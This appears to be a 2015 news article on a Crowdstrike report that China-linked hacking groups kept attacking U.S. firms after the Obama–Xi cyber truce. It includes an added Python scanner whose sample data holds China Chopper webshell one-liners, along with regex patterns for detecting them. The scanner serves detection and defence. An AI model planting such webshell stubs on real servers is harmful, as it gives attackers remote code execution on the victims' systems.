Update: Chinese Govt. Hackers Still Active Despite Truce

A timeline compares President Xi's visit to the U.S. with recorded attacks on critical U.S. industries linked to groups in China.

In-brief: A truce hammered out between U.S. President Barack Obama and Chinese President Xi Jinping in September hasn’t kept hacking groups that are believed to be affiliated with China’s People’s Liberation Army (PLA) from playing offense, according to a report from the security firm Crowdstrike. (Updated to add comment from Ken Westin of Tripwire. PFR 10/19/2015)

A truce hammered out between U.S. President Barack Obama and Chinese President Xi Jinping in September hasn’t kept hacking groups that are believed to be affiliated with China’s People’s Liberation Army (PLA) from playing offense, according to a report from the security firm Crowdstrike.

Hacking groups with known or suspected connections to the Chinese military and Communist Party have been observed breaking into U.S. firms that “fit squarely within the hacking prohibitions covered under the Cyber agreement,” including one incident that occurred the day after the bilateral agreement was signed, according to a blog post on Monday by Dmitri Alperovitch, Crowdstrike’s co-founder and CTO.

The company, which sells software and services designed to spot and block sophisticated cyber attackers, released a timeline that shows 13 recorded attacks since President Xi’s visit to the United States began on September 21. Those include attacks on companies in the technology, energy and pharmaceutical sectors.


The attacks were not all successful. But they were traceable to known hacking groups, including Deep Panda, a long-running hacking crew that specializes in compromising defense industrial base firms and other companies in sectors that are known to be of interest to China’s leaders, including agriculture, chemical, financial services, healthcare, insurance and law, Alperovitch said.

Chinese Foreign Ministry spokeswoman Hua Chunying, speaking with the Reuters News Agency, denied that the government was behind the incidents.

“Internet hacking attacks are marked by their secretive, cross border nature,” she told a daily news briefing.

Crowdstrike said the intrusions were frequently carried out via attacks on Web servers using techniques like SQL injection, in which attacker-supplied input is folded into the queries a web application sends to its database, letting the attacker run SQL of their own choosing. Successful compromises were followed by the placement of “China Chopper” webshells: a tiny server-side script that executes whatever code the attacker posts to it, giving them a persistent toe hold on the compromised network. Crowdstrike said it has also detected attacks that deployed the Derusbi and PlugX malware, which are tools of choice for other Chinese hacking crews.
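Because the China Chopper server-side component is so small (a single eval of an HTTP request parameter), a practical first check after a suspected web server compromise is to scan the web root for that pattern. The following is an added example, not code from Crowdstrike or from the original article: it runs the publicly documented China Chopper PHP and ASPX stub patterns over a constructed, in-memory “web root” (the file names, contents and rule names are this example’s own assumptions) and flags any server-side script that matches, noting when the file is small enough to be a dropped stub rather than application code.

```python
import re

# Constructed sample web root for illustration (path -> file contents).
# Two files carry China Chopper-style one-liners; the rest are benign.
SAMPLE_WEBROOT = {
    "index.php": "<?php echo 'Welcome'; ?>",
    "uploads/avatar.php": "<?php @eval($_POST['password']);?>",
    "admin/Default.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "lib/helpers.php": "<?php\nfunction decode($s) { return base64_decode($s); }\n",
    "static/app.js": "eval(window.atob(payload));",
}

# Patterns for the documented China Chopper server-side stubs: a single eval
# of an HTTP request parameter. The rule names are this example's own.
RULES = [
    ("php_eval_request_param",
     re.compile(r"@?\beval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I)),
    ("aspx_eval_request_item",
     re.compile(r"\beval\s*\(\s*Request\.Item\s*\[", re.I)),
]

# Only server-executed script types are of interest; client-side JS is ignored.
SERVER_EXTENSIONS = (".php", ".asp", ".aspx", ".jsp", ".ashx")
# Threshold (assumed) below which a matching file is more likely a dropped stub.
SMALL_FILE_BYTES = 512


def scan_file(path, content):
    """Return the names of rules matching a server-side script; [] if clean."""
    if not path.lower().endswith(SERVER_EXTENSIONS):
        return []
    return [name for name, rx in RULES if rx.search(content)]


def scan_webroot(files):
    """Return {path: [rule, ...]} for every file matching at least one rule,
    appending 'tiny_script' when the file is small enough to be a dropped stub."""
    findings = {}
    for path, content in files.items():
        hits = scan_file(path, content)
        if hits:
            if len(content.encode()) <= SMALL_FILE_BYTES:
                hits.append("tiny_script")
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_webroot(SAMPLE_WEBROOT).items():
        print(f"{path}: {', '.join(hits)}")
```

On a real host the dictionary would be replaced by a walk of the document root; anything this flags deserves a look, since an eval of raw request input is a serious bug even when it was written by the application’s own developers. The check is deliberately narrow: it will not catch obfuscated or base64-wrapped shells, so it complements, rather than replaces, file-integrity monitoring of the web root.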

The company informed the White House about its findings. A senior Obama administration official, who asked to remain anonymous, said the government was aware of CrowdStrike’s findings but declined to address its conclusions, Reuters reported.

The Obama Administration promoted the September agreement between Xi and President Obama as a diplomatic victory and a way to remove pressure from U.S. corporations, who have long suffered from devastating and targeted attacks by groups with links to China. On September 25, the United States and China agreed that “timely responses should be provided to requests for information and assistance concerning malicious cyber activities” and to “cooperate, in a manner consistent with their respective national laws and relevant international obligations, with requests to investigate cyber crimes, collect electronic evidence, and mitigate malicious cyber activity emanating from their territory.” More important: the two sides agreed that “neither country’s government will conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.”

Still, experts were skeptical that any agreement could quell attempts by China or other nations to siphon off valuable intelligence or intellectual property from U.S. firms, especially given the difficulty in attributing cyber attacks to a specific nation or actor.

The agreement between the two governments was political, notes Ken Westin, a senior security analyst at the firm Tripwire. But as a practical matter, it excludes many possible types of espionage, and lacks the specificity or legal standing to be enforceable, he said. “I think there’s a lot of loosey goosey language,” Westin said.

Besides, were hacking from China to cease in the wake of the agreement, it would only reinforce the links between the hacking groups and the Chinese government, proving the U.S.’s point, Westin observes.

While the agreement may at least lay the groundwork for China cooperating in legal prosecution of hacking groups working within its borders, it is doubtful that the U.S. intelligence community would be eager to reveal its methods for connecting attacks to specific threat actors within the People’s Republic of China, Westin said. “I think (the U.S.) is stuck in a log jam,” he said.